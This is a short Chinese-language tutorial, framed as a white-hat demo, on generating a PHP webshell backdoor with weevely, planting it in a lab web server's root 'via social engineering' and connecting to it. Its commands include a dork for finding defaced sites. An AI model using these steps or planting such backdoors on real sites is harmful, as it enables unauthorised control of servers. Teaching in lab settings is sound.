网络安全工程师演示：白帽黑客使用Kali Linux“中国菜刀”weevely网站渗透技巧

一、背景介绍

生成和管理很难检测到的PHP木马，Weevely是一个隐形的PHP网页的外壳，模拟的远程连接。这是一个Web应用程序后开发的重要工具，可用于像一个隐藏的后门，作为一个有用的远程控制台更换管理网络帐户，即使托管在免费托管服务。只是生成并上传“服务器”目标Web服务器上的PHP代码，Weevely客户端在本地运行shell命令传输。

那么如何利用weevely控制目标主机呢？接下来让我们一起学习！

二、资源装备

1.安装好 Kali Linux 的虚拟机一台

2.受害者主机一个；

3.整装待发的小白一个。

三、渗透测试

3.1 利用搜索引擎检索已经被黑客挂黑页的网站，如下图所示。

谷歌语法：intltle:hacked by

3.2 在攻击者主机打开Kali 中的中国菜刀软件（weevely）,如下图所示。

命令：weevely

3.3 在受害者主机安装网站环境，这里以phpstudy集成环境举例，如下图所示。

步骤：百度检索phpstudy

下载网址： https://www.xp.cn/download.html

安装教程： https://www.php.cn/php-weizijiaocheng-396668.html

3.4 利用weevely工具在攻击者主机生成shell.php后门文件，如下图所示。

命令：weevely generate admin /tmp/shell.php

3.5 查看生成的shell.php文件内容，如下图所示。

命令：cat /tmp/shell.php

3.6 将生成的后门文件利用社会工程学导入受害者网站根目录，如下图所示。

3.7 查看受害者主机的IP地址，如下图所示。

命令：ipconfig

3.8 连接后门，如下图所示。

命令：weevely http://192.168.0.103/shell.php admin

3.9 查看拿下的网站目录，如下图所示。

命令：dir